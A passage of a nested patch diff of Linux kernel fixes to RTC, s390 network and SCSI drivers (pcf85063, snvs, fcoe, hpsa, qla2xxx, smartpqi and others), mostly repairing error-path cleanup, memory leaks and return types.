+ 		.of_match_table = of_match_ptr(pcf2127_of_match),
+ 	},
+-	.probe		= pcf2127_i2c_probe,
++	.probe_new	= pcf2127_i2c_probe,
+ 	.id_table	= pcf2127_i2c_id,
+ };
+ 
+diff --git a/drivers/rtc/rtc-pcf85063.c b/drivers/rtc/rtc-pcf85063.c
+index 095891999da11..754e03984f986 100644
+--- a/drivers/rtc/rtc-pcf85063.c
++++ b/drivers/rtc/rtc-pcf85063.c
+@@ -169,10 +169,10 @@ static int pcf85063_rtc_read_alarm(struct device *dev, struct rtc_wkalrm *alrm)
+ 	if (ret)
+ 		return ret;
+ 
+-	alrm->time.tm_sec = bcd2bin(buf[0]);
+-	alrm->time.tm_min = bcd2bin(buf[1]);
+-	alrm->time.tm_hour = bcd2bin(buf[2]);
+-	alrm->time.tm_mday = bcd2bin(buf[3]);
++	alrm->time.tm_sec = bcd2bin(buf[0] & 0x7f);
++	alrm->time.tm_min = bcd2bin(buf[1] & 0x7f);
++	alrm->time.tm_hour = bcd2bin(buf[2] & 0x3f);
++	alrm->time.tm_mday = bcd2bin(buf[3] & 0x3f);
+ 
+ 	ret = regmap_read(pcf85063->regmap, PCF85063_REG_CTRL2, &val);
+ 	if (ret)
+@@ -424,7 +424,7 @@ static int pcf85063_clkout_control(struct clk_hw *hw, bool enable)
+ 	unsigned int buf;
+ 	int ret;
+ 
+-	ret = regmap_read(pcf85063->regmap, PCF85063_REG_OFFSET, &buf);
++	ret = regmap_read(pcf85063->regmap, PCF85063_REG_CTRL2, &buf);
+ 	if (ret < 0)
+ 		return ret;
+ 	buf &= PCF85063_REG_CLKO_F_MASK;
+diff --git a/drivers/rtc/rtc-pic32.c b/drivers/rtc/rtc-pic32.c
+index 7fb9145c43bd5..fa351ac201587 100644
+--- a/drivers/rtc/rtc-pic32.c
++++ b/drivers/rtc/rtc-pic32.c
+@@ -324,16 +324,16 @@ static int pic32_rtc_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&pdata->alarm_lock);
+ 
++	pdata->rtc = devm_rtc_allocate_device(&pdev->dev);
++	if (IS_ERR(pdata->rtc))
++		return PTR_ERR(pdata->rtc);
++
+ 	clk_prepare_enable(pdata->clk);
+ 
+ 	pic32_rtc_enable(pdata, 1);
+ 
+ 	device_init_wakeup(&pdev->dev, 1);
+ 
+-	pdata->rtc = devm_rtc_allocate_device(&pdev->dev);
+-	if (IS_ERR(pdata->rtc))
+-		return PTR_ERR(pdata->rtc);
+-
+ 	pdata->rtc->ops = &pic32_rtcops;
+ 	pdata->rtc->range_min = RTC_TIMESTAMP_BEGIN_2000;
+ 	pdata->rtc->range_max = RTC_TIMESTAMP_END_2099;
+diff --git a/drivers/rtc/rtc-rzn1.c b/drivers/rtc/rtc-rzn1.c
+index ac788799c8e3e..0d36bc50197c1 100644
+--- a/drivers/rtc/rtc-rzn1.c
++++ b/drivers/rtc/rtc-rzn1.c
+@@ -355,7 +355,9 @@ static int rzn1_rtc_probe(struct platform_device *pdev)
+ 	set_bit(RTC_FEATURE_ALARM_RES_MINUTE, rtc->rtcdev->features);
+ 	clear_bit(RTC_FEATURE_UPDATE_INTERRUPT, rtc->rtcdev->features);
+ 
+-	devm_pm_runtime_enable(&pdev->dev);
++	ret = devm_pm_runtime_enable(&pdev->dev);
++	if (ret < 0)
++		return ret;
+ 	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/rtc/rtc-snvs.c b/drivers/rtc/rtc-snvs.c
+index bd929b0e7d7de..d82acf1af1fae 100644
+--- a/drivers/rtc/rtc-snvs.c
++++ b/drivers/rtc/rtc-snvs.c
+@@ -32,6 +32,14 @@
+ #define SNVS_LPPGDR_INIT	0x41736166
+ #define CNTR_TO_SECS_SH		15
+ 
++/* The maximum RTC clock cycles that are allowed to pass between two
++ * consecutive clock counter register reads. If the values are corrupted a
++ * bigger difference is expected. The RTC frequency is 32kHz. With 320 cycles
++ * we end at 10ms which should be enough for most cases. If it once takes
++ * longer than expected we do a retry.
++ */
++#define MAX_RTC_READ_DIFF_CYCLES	320
++
+ struct snvs_rtc_data {
+ 	struct rtc_device *rtc;
+ 	struct regmap *regmap;
+@@ -56,6 +64,7 @@ static u64 rtc_read_lpsrt(struct snvs_rtc_data *data)
+ static u32 rtc_read_lp_counter(struct snvs_rtc_data *data)
+ {
+ 	u64 read1, read2;
++	s64 diff;
+ 	unsigned int timeout = 100;
+ 
+ 	/* As expected, the registers might update between the read of the LSB
+@@ -66,7 +75,8 @@ static u32 rtc_read_lp_counter(struct snvs_rtc_data *data)
+ 	do {
+ 		read2 = read1;
+ 		read1 = rtc_read_lpsrt(data);
+-	} while (read1 != read2 && --timeout);
++		diff = read1 - read2;
++	} while (((diff < 0) || (diff > MAX_RTC_READ_DIFF_CYCLES)) && --timeout);
+ 	if (!timeout)
+ 		dev_err(&data->rtc->dev, "Timeout trying to get valid LPSRT Counter read\n");
+ 
+@@ -78,13 +88,15 @@ static u32 rtc_read_lp_counter(struct snvs_rtc_data *data)
+ static int rtc_read_lp_counter_lsb(struct snvs_rtc_data *data, u32 *lsb)
+ {
+ 	u32 count1, count2;
++	s32 diff;
+ 	unsigned int timeout = 100;
+ 
+ 	regmap_read(data->regmap, data->offset + SNVS_LPSRTCLR, &count1);
+ 	do {
+ 		count2 = count1;
+ 		regmap_read(data->regmap, data->offset + SNVS_LPSRTCLR, &count1);
+-	} while (count1 != count2 && --timeout);
++		diff = count1 - count2;
++	} while (((diff < 0) || (diff > MAX_RTC_READ_DIFF_CYCLES)) && --timeout);
+ 	if (!timeout) {
+ 		dev_err(&data->rtc->dev, "Timeout trying to get valid LPSRT Counter read\n");
+ 		return -ETIMEDOUT;
+diff --git a/drivers/rtc/rtc-st-lpc.c b/drivers/rtc/rtc-st-lpc.c
+index bdb20f63254e2..0f8e4231098ef 100644
+--- a/drivers/rtc/rtc-st-lpc.c
++++ b/drivers/rtc/rtc-st-lpc.c
+@@ -238,6 +238,7 @@ static int st_rtc_probe(struct platform_device *pdev)
+ 
+ 	rtc->clkrate = clk_get_rate(rtc->clk);
+ 	if (!rtc->clkrate) {
++		clk_disable_unprepare(rtc->clk);
+ 		dev_err(&pdev->dev, "Unable to fetch clock rate\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/s390/net/ctcm_main.c b/drivers/s390/net/ctcm_main.c
+index 37b551bd43bff..bdfab9ea00464 100644
+--- a/drivers/s390/net/ctcm_main.c
++++ b/drivers/s390/net/ctcm_main.c
+@@ -825,16 +825,9 @@ done:
+ /*
+  * Start transmission of a packet.
+  * Called from generic network device layer.
+- *
+- *  skb		Pointer to buffer containing the packet.
+- *  dev		Pointer to interface struct.
+- *
+- * returns 0 if packet consumed, !0 if packet rejected.
+- *         Note: If we return !0, then the packet is free'd by
+- *               the generic network layer.
+  */
+ /* first merge version - leaving both functions separated */
+-static int ctcm_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t ctcm_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct ctcm_priv *priv = dev->ml_priv;
+ 
+@@ -877,7 +870,7 @@ static int ctcm_tx(struct sk_buff *skb, struct net_device *dev)
+ }
+ 
+ /* unmerged MPC variant of ctcm_tx */
+-static int ctcmpc_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t ctcmpc_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	int len = 0;
+ 	struct ctcm_priv *priv = dev->ml_priv;
+diff --git a/drivers/s390/net/lcs.c b/drivers/s390/net/lcs.c
+index 84c8981317b46..38f312664ce72 100644
+--- a/drivers/s390/net/lcs.c
++++ b/drivers/s390/net/lcs.c
+@@ -1519,9 +1519,8 @@ lcs_txbuffer_cb(struct lcs_channel *channel, struct lcs_buffer *buffer)
+ /*
+  * Packet transmit function called by network stack
+  */
+-static int
+-__lcs_start_xmit(struct lcs_card *card, struct sk_buff *skb,
+-		 struct net_device *dev)
++static netdev_tx_t __lcs_start_xmit(struct lcs_card *card, struct sk_buff *skb,
++				    struct net_device *dev)
+ {
+ 	struct lcs_header *header;
+ 	int rc = NETDEV_TX_OK;
+@@ -1582,8 +1581,7 @@ out:
+ 	return rc;
+ }
+ 
+-static int
+-lcs_start_xmit(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t lcs_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct lcs_card *card;
+ 	int rc;
+diff --git a/drivers/s390/net/netiucv.c b/drivers/s390/net/netiucv.c
+index 65aa0a96c21de..66076cada8ae4 100644
+--- a/drivers/s390/net/netiucv.c
++++ b/drivers/s390/net/netiucv.c
+@@ -1248,15 +1248,8 @@ static int netiucv_close(struct net_device *dev)
+ /*
+  * Start transmission of a packet.
+  * Called from generic network device layer.
+- *
+- * @param skb Pointer to buffer containing the packet.
+- * @param dev Pointer to interface struct.
+- *
+- * @return 0 if packet consumed, !0 if packet rejected.
+- *         Note: If we return !0, then the packet is free'd by
+- *               the generic network layer.
+  */
+-static int netiucv_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t netiucv_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct netiucv_priv *privptr = netdev_priv(dev);
+ 	int rc;
+diff --git a/drivers/scsi/elx/efct/efct_driver.c b/drivers/scsi/elx/efct/efct_driver.c
+index b08fc8839808d..49fd2cfed70c7 100644
+--- a/drivers/scsi/elx/efct/efct_driver.c
++++ b/drivers/scsi/elx/efct/efct_driver.c
+@@ -42,6 +42,7 @@ efct_device_init(void)
+ 
+ 	rc = efct_scsi_reg_fc_transport();
+ 	if (rc) {
++		efct_scsi_tgt_driver_exit();
+ 		pr_err("failed to register to FC host\n");
+ 		return rc;
+ 	}
+diff --git a/drivers/scsi/elx/libefc/efclib.h b/drivers/scsi/elx/libefc/efclib.h
+index dde20891c2dd7..57e3386128127 100644
+--- a/drivers/scsi/elx/libefc/efclib.h
++++ b/drivers/scsi/elx/libefc/efclib.h
+@@ -58,10 +58,12 @@ enum efc_node_send_ls_acc {
+ #define EFC_LINK_STATUS_UP		0
+ #define EFC_LINK_STATUS_DOWN		1
+ 
++enum efc_sm_event;
++
+ /* State machine context header  */
+ struct efc_sm_ctx {
+ 	void (*current_state)(struct efc_sm_ctx *ctx,
+-			      u32 evt, void *arg);
++			      enum efc_sm_event evt, void *arg);
+ 
+ 	const char	*description;
+ 	void		*app;
+@@ -365,7 +367,7 @@ struct efc_node {
+ 	int			prev_evt;
+ 
+ 	void (*nodedb_state)(struct efc_sm_ctx *ctx,
+-			     u32 evt, void *arg);
++			     enum efc_sm_event evt, void *arg);
+ 	struct timer_list	gidpt_delay_timer;
+ 	u64			time_last_gidpt_msec;
+ 
+diff --git a/drivers/scsi/fcoe/fcoe.c b/drivers/scsi/fcoe/fcoe.c
+index 6ec296321ffc1..38774a272e627 100644
+--- a/drivers/scsi/fcoe/fcoe.c
++++ b/drivers/scsi/fcoe/fcoe.c
+@@ -2491,6 +2491,7 @@ static int __init fcoe_init(void)
+ 
+ out_free:
+ 	mutex_unlock(&fcoe_config_mutex);
++	fcoe_transport_detach(&fcoe_sw_transport);
+ out_destroy:
+ 	destroy_workqueue(fcoe_wq);
+ 	return rc;
+diff --git a/drivers/scsi/fcoe/fcoe_sysfs.c b/drivers/scsi/fcoe/fcoe_sysfs.c
+index af658aa38fedf..6260aa5ea6af8 100644
+--- a/drivers/scsi/fcoe/fcoe_sysfs.c
++++ b/drivers/scsi/fcoe/fcoe_sysfs.c
+@@ -830,14 +830,15 @@ struct fcoe_ctlr_device *fcoe_ctlr_device_add(struct device *parent,
+ 
+ 	dev_set_name(&ctlr->dev, "ctlr_%d", ctlr->id);
+ 	error = device_register(&ctlr->dev);
+-	if (error)
+-		goto out_del_q2;
++	if (error) {
++		destroy_workqueue(ctlr->devloss_work_q);
++		destroy_workqueue(ctlr->work_q);
++		put_device(&ctlr->dev);
++		return NULL;
++	}
+ 
+ 	return ctlr;
+ 
+-out_del_q2:
+-	destroy_workqueue(ctlr->devloss_work_q);
+-	ctlr->devloss_work_q = NULL;
+ out_del_q:
+ 	destroy_workqueue(ctlr->work_q);
+ 	ctlr->work_q = NULL;
+@@ -1036,16 +1037,16 @@ struct fcoe_fcf_device *fcoe_fcf_device_add(struct fcoe_ctlr_device *ctlr,
+ 	fcf->selected = new_fcf->selected;
+ 
+ 	error = device_register(&fcf->dev);
+-	if (error)
+-		goto out_del;
++	if (error) {
++		put_device(&fcf->dev);
++		goto out;
++	}
+ 
+ 	fcf->state = FCOE_FCF_STATE_CONNECTED;
+ 	list_add_tail(&fcf->peers, &ctlr->fcfs);
+ 
+ 	return fcf;
+ 
+-out_del:
+-	kfree(fcf);
+ out:
+ 	return NULL;
+ }
+diff --git a/drivers/scsi/hpsa.c b/drivers/scsi/hpsa.c
+index f8e832b1bc46a..4dbf51e2623ad 100644
+--- a/drivers/scsi/hpsa.c
++++ b/drivers/scsi/hpsa.c
+@@ -8925,7 +8925,7 @@ clean1:	/* wq/aer/h */
+ 		destroy_workqueue(h->monitor_ctlr_wq);
+ 		h->monitor_ctlr_wq = NULL;
+ 	}
+-	kfree(h);
++	hpda_free_ctlr_info(h);
+ 	return rc;
+ }
+ 
+@@ -9786,7 +9786,8 @@ static int hpsa_add_sas_host(struct ctlr_info *h)
+ 	return 0;
+ 
+ free_sas_phy:
+-	hpsa_free_sas_phy(hpsa_sas_phy);
++	sas_phy_free(hpsa_sas_phy->phy);
++	kfree(hpsa_sas_phy);
+ free_sas_port:
+ 	hpsa_free_sas_port(hpsa_sas_port);
+ free_sas_node:
+@@ -9822,10 +9823,12 @@ static int hpsa_add_sas_device(struct hpsa_sas_node *hpsa_sas_node,
+ 
+ 	rc = hpsa_sas_port_add_rphy(hpsa_sas_port, rphy);
+ 	if (rc)
+-		goto free_sas_port;
++		goto free_sas_rphy;
+ 
+ 	return 0;
+ 
++free_sas_rphy:
++	sas_rphy_free(rphy);
+ free_sas_port:
+ 	hpsa_free_sas_port(hpsa_sas_port);
+ 	device->sas_port = NULL;
+diff --git a/drivers/scsi/ipr.c b/drivers/scsi/ipr.c
+index 9d01a3e3c26aa..2022ffb450417 100644
+--- a/drivers/scsi/ipr.c
++++ b/drivers/scsi/ipr.c
+@@ -10872,11 +10872,19 @@ static struct notifier_block ipr_notifier = {
+  **/
+ static int __init ipr_init(void)
+ {
++	int rc;
++
+ 	ipr_info("IBM Power RAID SCSI Device Driver version: %s %s\n",
+ 		 IPR_DRIVER_VERSION, IPR_DRIVER_DATE);
+ 
+ 	register_reboot_notifier(&ipr_notifier);
+-	return pci_register_driver(&ipr_driver);
++	rc = pci_register_driver(&ipr_driver);
++	if (rc) {
++		unregister_reboot_notifier(&ipr_notifier);
++		return rc;
++	}
++
++	return 0;
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 99d06dc7ddf6b..21c52154626f1 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -8150,10 +8150,10 @@ u32 lpfc_rx_monitor_report(struct lpfc_hba *phba,
+ 					"IO_cnt", "Info", "BWutil(ms)");
+ 	}
+ 
+-	/* Needs to be _bh because record is called from timer interrupt
++	/* Needs to be _irq because record is called from timer interrupt
+ 	 * context
+ 	 */
+-	spin_lock_bh(ring_lock);
++	spin_lock_irq(ring_lock);
+ 	while (*head_idx != *tail_idx) {
+ 		entry = &ring[*head_idx];
+ 
+@@ -8197,7 +8197,7 @@ u32 lpfc_rx_monitor_report(struct lpfc_hba *phba,
+ 		if (cnt >= max_read_entries)
+ 			break;
+ 	}
+-	spin_unlock_bh(ring_lock);
++	spin_unlock_irq(ring_lock);
+ 
+ 	return cnt;
+ }
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_transport.c b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+index 0681daee6c149..e5ecd6ada6cdd 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_transport.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+@@ -829,6 +829,8 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 	if ((sas_rphy_add(rphy))) {
+ 		ioc_err(ioc, "failure at %s:%d/%s()!\n",
+ 			__FILE__, __LINE__, __func__);
++		sas_rphy_free(rphy);
++		rphy = NULL;
+ 	}
+ 
+ 	if (mpt3sas_port->remote_identify.device_type == SAS_END_DEVICE) {
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 802eec6407d9a..a26a373be9da3 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -5136,17 +5136,17 @@ struct secure_flash_update_block_pk {
+ 		(test_bit(ISP_ABORT_NEEDED, &ha->dpc_flags) || \
+ 			 test_bit(LOOP_RESYNC_NEEDED, &ha->dpc_flags))
+ 
+-#define QLA_VHA_MARK_BUSY(__vha, __bail) do {		\
+-	atomic_inc(&__vha->vref_count);			\
+-	mb();						\
+-	if (__vha->flags.delete_progress) {		\
+-		atomic_dec(&__vha->vref_count);		\
+-		wake_up(&__vha->vref_waitq);		\
+-		__bail = 1;				\
+-	} else {					\
+-		__bail = 0;				\
+-	}						\
+-} while (0)
++static inline bool qla_vha_mark_busy(scsi_qla_host_t *vha)
++{
++	atomic_inc(&vha->vref_count);
++	mb();
++	if (vha->flags.delete_progress) {
++		atomic_dec(&vha->vref_count);
++		wake_up(&vha->vref_waitq);
++		return true;
++	}
++	return false;
++}
+ 
+ #define QLA_VHA_MARK_NOT_BUSY(__vha) do {		\
+ 	atomic_dec(&__vha->vref_count);			\
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index e12db95de6883..432f47fc5e1f3 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -110,6 +110,7 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 	struct qla_qpair *qpair = sp->qpair;
+ 	u32 handle;
+ 	unsigned long flags;
++	int sp_found = 0, cmdsp_found = 0;
+ 
+ 	if (sp->cmd_sp)
+ 		ql_dbg(ql_dbg_async, sp->vha, 0x507c,
+@@ -124,18 +125,21 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 	spin_lock_irqsave(qpair->qp_lock_ptr, flags);
+ 	for (handle = 1; handle < qpair->req->num_outstanding_cmds; handle++) {
+ 		if (sp->cmd_sp && (qpair->req->outstanding_cmds[handle] ==
+-		    sp->cmd_sp))
++		    sp->cmd_sp)) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
++			cmdsp_found = 1;
++		}
+ 
+ 		/* removing the abort */
+ 		if (qpair->req->outstanding_cmds[handle] == sp) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
++			sp_found = 1;
+ 			break;
+ 		}
+ 	}
+ 	spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
+ 
+-	if (sp->cmd_sp) {
++	if (cmdsp_found && sp->cmd_sp) {
+ 		/*
+ 		 * This done function should take care of
+ 		 * original command ref: INIT
+@@ -143,8 +147,10 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 		sp->cmd_sp->done(sp->cmd_sp, QLA_OS_TIMER_EXPIRED);
+ 	}
+ 
+-	abt->u.abt.comp_status = cpu_to_le16(CS_TIMEOUT);
+-	sp->done(sp, QLA_OS_TIMER_EXPIRED);
++	if (sp_found) {
++		abt->u.abt.comp_status = cpu_to_le16(CS_TIMEOUT);
++		sp->done(sp, QLA_OS_TIMER_EXPIRED);
++	}
+ }
+ 
+ static void qla24xx_abort_sp_done(srb_t *sp, int res)
+@@ -168,7 +174,6 @@ int qla24xx_async_abort_cmd(srb_t *cmd_sp, bool wait)
+ 	struct srb_iocb *abt_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+-	uint8_t bail;
+ 
+ 	/* ref: INIT for ABTS command */
+ 	sp = qla2xxx_get_qpair_sp(cmd_sp->vha, cmd_sp->qpair, cmd_sp->fcport,
+@@ -176,7 +181,7 @@ int qla24xx_async_abort_cmd(srb_t *cmd_sp, bool wait)
+ 	if (!sp)
+ 		return QLA_MEMORY_ALLOC_FAILED;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
++	qla_vha_mark_busy(vha);
+ 	abt_iocb = &sp->u.iocb_cmd;
+ 	sp->type = SRB_ABT_CMD;
+ 	sp->name = "abort";
+@@ -2020,14 +2025,13 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ 	struct srb_iocb *tm_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+-	uint8_t bail;
+ 
+ 	/* ref: INIT */
+ 	sp = qla2x00_get_sp(vha, fcport, GFP_KERNEL);
+ 	if (!sp)
+ 		goto done;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
++	qla_vha_mark_busy(vha);
+ 	sp->type = SRB_TM_CMD;
+ 	sp->name = "tmf";
+ 	qla2x00_init_async_sp(sp, qla2x00_get_async_timeout(vha),
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index db17f7f410cdd..5185dc5daf80d 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -225,11 +225,9 @@ static inline srb_t *
+ qla2x00_get_sp(scsi_qla_host_t *vha, fc_port_t *fcport, gfp_t flag)
+ {
+ 	srb_t *sp = NULL;
+-	uint8_t bail;
+ 	struct qla_qpair *qpair;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
+-	if (unlikely(bail))
++	if (unlikely(qla_vha_mark_busy(vha)))
+ 		return NULL;
+ 
+ 	qpair = vha->hw->base_qpair;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 2c85f3cce7264..96ba1398f20c1 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -5069,13 +5069,11 @@ struct qla_work_evt *
+ qla2x00_alloc_work(struct scsi_qla_host *vha, enum qla_work_type type)
+ {
+ 	struct qla_work_evt *e;
+-	uint8_t bail;
+ 
+ 	if (test_bit(UNLOADING, &vha->dpc_flags))
+ 		return NULL;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
+-	if (bail)
++	if (qla_vha_mark_busy(vha))
+ 		return NULL;
+ 
+ 	e = kzalloc(sizeof(struct qla_work_evt), GFP_ATOMIC);
+diff --git a/drivers/scsi/scsi_debug.c b/drivers/scsi/scsi_debug.c
+index bebda917b1383..b77035ddc9440 100644
+--- a/drivers/scsi/scsi_debug.c
++++ b/drivers/scsi/scsi_debug.c
+@@ -3785,7 +3785,7 @@ static int resp_write_scat(struct scsi_cmnd *scp,
+ 		mk_sense_buffer(scp, ILLEGAL_REQUEST, INVALID_FIELD_IN_CDB, 0);
+ 		return illegal_condition_result;
+ 	}
+-	lrdp = kzalloc(lbdof_blen, GFP_ATOMIC);
++	lrdp = kzalloc(lbdof_blen, GFP_ATOMIC | __GFP_NOWARN);
+ 	if (lrdp == NULL)
+ 		return SCSI_MLQUEUE_HOST_BUSY;
+ 	if (sdebug_verbose)
+@@ -4436,7 +4436,7 @@ static int resp_verify(struct scsi_cmnd *scp, struct sdebug_dev_info *devip)
+ 	if (ret)
+ 		return ret;
+ 
+-	arr = kcalloc(lb_size, vnum, GFP_ATOMIC);
++	arr = kcalloc(lb_size, vnum, GFP_ATOMIC | __GFP_NOWARN);
+ 	if (!arr) {
+ 		mk_sense_buffer(scp, ILLEGAL_REQUEST, INSUFF_RES_ASC,
+ 				INSUFF_RES_ASCQ);
+@@ -4504,7 +4504,7 @@ static int resp_report_zones(struct scsi_cmnd *scp,
+ 
+ 	rep_max_zones = (alloc_len - 64) >> ilog2(RZONES_DESC_HD);
+ 
+-	arr = kzalloc(alloc_len, GFP_ATOMIC);
++	arr = kzalloc(alloc_len, GFP_ATOMIC | __GFP_NOWARN);
+ 	if (!arr) {
+ 		mk_sense_buffer(scp, ILLEGAL_REQUEST, INSUFF_RES_ASC,
+ 				INSUFF_RES_ASCQ);
+@@ -7340,7 +7340,10 @@ clean:
+ 		kfree(sdbg_devinfo->zstate);
+ 		kfree(sdbg_devinfo);
+ 	}
+-	kfree(sdbg_host);
++	if (sdbg_host->dev.release)
++		put_device(&sdbg_host->dev);
++	else
++		kfree(sdbg_host);
+ 	pr_warn("%s: failed, errno=%d\n", __func__, -error);
+ 	return error;
+ }
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 6995c89792300..02520f9123066 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -343,19 +343,11 @@ enum blk_eh_timer_return scsi_timeout(struct request *req)
+ 
+ 	if (rtn == BLK_EH_DONE) {
+ 		/*
+-		 * Set the command to complete first in order to prevent a real
+-		 * completion from releasing the command while error handling
+-		 * is using it. If the command was already completed, then the
+-		 * lower level driver beat the timeout handler, and it is safe
+-		 * to return without escalating error recovery.
+-		 *
+-		 * If timeout handling lost the race to a real completion, the
+-		 * block layer may ignore that due to a fake timeout injection,
+-		 * so return RESET_TIMER to allow error handling another shot
+-		 * at this command.
++		 * If scsi_done() has already set SCMD_STATE_COMPLETE, do not
++		 * modify *scmd.
+ 		 */
+ 		if (test_and_set_bit(SCMD_STATE_COMPLETE, &scmd->state))
+-			return BLK_EH_RESET_TIMER;
++			return BLK_EH_DONE;
+ 		if (scsi_abort_command(scmd) != SUCCESS) {
+ 			set_host_byte(scmd, DID_TIME_OUT);
+ 			scsi_eh_scmd_add(scmd);
+diff --git a/drivers/scsi/smartpqi/smartpqi.h b/drivers/scsi/smartpqi/smartpqi.h
+index e550b12e525a1..c8235f15728bb 100644
+--- a/drivers/scsi/smartpqi/smartpqi.h
++++ b/drivers/scsi/smartpqi/smartpqi.h
+@@ -1130,7 +1130,7 @@ struct pqi_scsi_dev {
+ 	u8	phy_id;
+ 	u8	ncq_prio_enable;
+ 	u8	ncq_prio_support;
+-	u8	multi_lun_device_lun_count;
++	u8	lun_count;
+ 	bool	raid_bypass_configured;	/* RAID bypass configured */
+ 	bool	raid_bypass_enabled;	/* RAID bypass enabled */
+ 	u32	next_bypass_group[RAID_MAP_MAX_DATA_DISKS_PER_ROW];
+diff --git a/drivers/scsi/smartpqi/smartpqi_init.c b/drivers/scsi/smartpqi/smartpqi_init.c
+index b971fbe3b3a17..9f0f69c1ed665 100644
+--- a/drivers/scsi/smartpqi/smartpqi_init.c
++++ b/drivers/scsi/smartpqi/smartpqi_init.c
+@@ -1610,9 +1610,7 @@ static int pqi_get_physical_device_info(struct pqi_ctrl_info *ctrl_info,
+ 		&id_phys->alternate_paths_phys_connector,
+ 		sizeof(device->phys_connector));
+ 	device->bay = id_phys->phys_bay_in_box;
+-	device->multi_lun_device_lun_count = id_phys->multi_lun_device_lun_count;
+-	if (!device->multi_lun_device_lun_count)
+-		device->multi_lun_device_lun_count = 1;
++	device->lun_count = id_phys->multi_lun_device_lun_count;
+ 	if ((id_phys->even_more_flags & PQI_DEVICE_PHY_MAP_SUPPORTED) &&
+ 		id_phys->phy_count)
+ 		device->phy_id =
+@@ -1746,7 +1744,7 @@ out:
+ 	return offline;
+ }
+ 
+-static int pqi_get_device_info(struct pqi_ctrl_info *ctrl_info,
++static int pqi_get_device_info_phys_logical(struct pqi_ctrl_info *ctrl_info,
+ 	struct pqi_scsi_dev *device,
+ 	struct bmic_identify_physical_device *id_phys)
+ {
+@@ -1763,6 +1761,20 @@ static int pqi_get_device_info(struct pqi_ctrl_info *ctrl_info,
+ 	return rc;
+ }
+ 
++static int pqi_get_device_info(struct pqi_ctrl_info *ctrl_info,
++	struct pqi_scsi_dev *device,
++	struct bmic_identify_physical_device *id_phys)
++{
++	int rc;
++
++	rc = pqi_get_device_info_phys_logical(ctrl_info, device, id_phys);
++
++	if (rc == 0 && device->lun_count == 0)
++		device->lun_count = 1;
++
++	return rc;
++}
++
+ static void pqi_show_volume_status(struct pqi_ctrl_info *ctrl_info,
+ 	struct pqi_scsi_dev *device)
+ {
+@@ -1897,7 +1909,7 @@ static inline void pqi_remove_device(struct pqi_ctrl_info *ctrl_info, struct pqi
+ 	int rc;
+ 	int lun;
+ 
+-	for (lun = 0; lun < device->multi_lun_device_lun_count; lun++) {
++	for (lun = 0; lun < device->lun_count; lun++) {
+ 		rc = pqi_device_wait_for_pending_io(ctrl_info, device, lun,
+ 			PQI_REMOVE_DEVICE_PENDING_IO_TIMEOUT_MSECS);
+ 		if (rc)
+@@ -2076,6 +2088,7 @@ static void pqi_scsi_update_device(struct pqi_ctrl_info *ctrl_info,
+ 	existing_device->sas_address = new_device->sas_address;
+ 	existing_device->queue_depth = new_device->queue_depth;
+ 	existing_device->device_offline = false;
++	existing_device->lun_count = new_device->lun_count;
+ 
+ 	if (pqi_is_logical_device(existing_device)) {
+ 		existing_device->is_external_raid_device = new_device->is_external_raid_device;
+@@ -2108,10 +2121,6 @@ static void pqi_scsi_update_device(struct pqi_ctrl_info *ctrl_info,
+ 		existing_device->phy_connected_dev_type = new_device->phy_connected_dev_type;
+ 		memcpy(existing_device->box, new_device->box, sizeof(existing_device->box));
+ 		memcpy(existing_device->phys_connector, new_device->phys_connector, sizeof(existing_device->phys_connector));
+-
